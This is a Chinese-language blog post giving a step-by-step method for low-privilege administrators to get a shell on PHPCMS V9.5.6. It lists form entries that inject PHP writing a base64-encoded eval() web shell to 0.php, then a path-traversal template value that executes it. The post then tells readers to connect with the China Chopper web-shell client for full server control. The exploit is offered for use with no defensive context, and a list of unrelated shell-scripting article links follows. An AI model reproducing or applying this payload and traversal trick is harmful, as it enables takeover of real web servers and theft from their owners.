PHPCMS后台低权限拿SHELL

简介: 前提是需要有管理专题的权限测试版本PHPCMS程序版本:Phpcms V9.5.6 Release

前提是需要有管理专题的权限

测试版本

PHPCMS程序版本:Phpcms V9.5.6 Release

过程

1. 添加专题

专题名称:test

专题横幅:/1.jpg

专题缩略图:/1.jpg

专题导读:<?php file_put_contents('0.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWzVdKTs/Pg==')); ?>

生成静态:是

专题生成目录:test000

专题子分类:test test


其他默认 -> 提交

2. 再次添加专题

专题名称:test1

专题横幅:/1.jpg

专题缩略图:/1.jpg

专题导读:

生成静态:是

专题生成目录:test111

专题子分类:test test


扩展设置

专题模板:value设置为 ../../../../html/special/test000/index


其他默认 -> 提交

最后生成文件 0.php, 直接使用中国菜刀进行注入,即可获取服务器全部权限,不会使用中国菜刀的 ,自行咕狗,使用此类方法也可以进行PHP大马以及小马的注入,直接可以控制服务器后台。

相关文章
|
6月前
|
Linux Shell 开发工具
Shell的运行原理以及Linux当中的权限问题
Shell的运行原理以及Linux当中的权限问题
82 0
|
3月前
|
Shell Linux 程序员
详解shell 运行原理及Linux权限
详解shell 运行原理及Linux权限
|
6月前
|
Linux Shell 程序员
【Linux】权限(shell运行原理、概念,Linux权限)
【Linux】权限(shell运行原理、概念,Linux权限)
57 2
|
5月前
|
Ubuntu Shell Linux
linux shell 后台执行脚本的方法 脚本后台运行 后台运行程
linux shell 后台执行脚本的方法 脚本后台运行 后台运行程
158 0
|
6月前
|
存储 Shell 数据安全/隐私保护
ZooKeeper【基础知识 04】控制权限ACL(原生的 Shell 命令)
【4月更文挑战第11天】ZooKeeper【基础知识 04】控制权限ACL(原生的 Shell 命令)
100 7
|
6月前
|
Shell Linux 开发工具
shell的介绍以及Linux权限的讲解
shell的介绍以及Linux权限的讲解
84 2
|
6月前
|
Shell Linux C++
【Shell 编程设计】 编写自己的清理后台的Shell脚本
【Shell 编程设计】 编写自己的清理后台的Shell脚本
79 1
|
6月前
|
Shell Linux C语言
【Shell 命令集合 网络通讯 】Linux 设置终端机的写入权限 mesg 命令 使用指南
【Shell 命令集合 网络通讯 】Linux 设置终端机的写入权限 mesg 命令 使用指南
50 0
|
1月前
|
Shell
一个用于添加/删除定时任务的shell脚本
一个用于添加/删除定时任务的shell脚本
75 1
|
17天前
|
Shell Linux 测试技术
6种方法打造出色的Shell脚本
6种方法打造出色的Shell脚本
40 2
6种方法打造出色的Shell脚本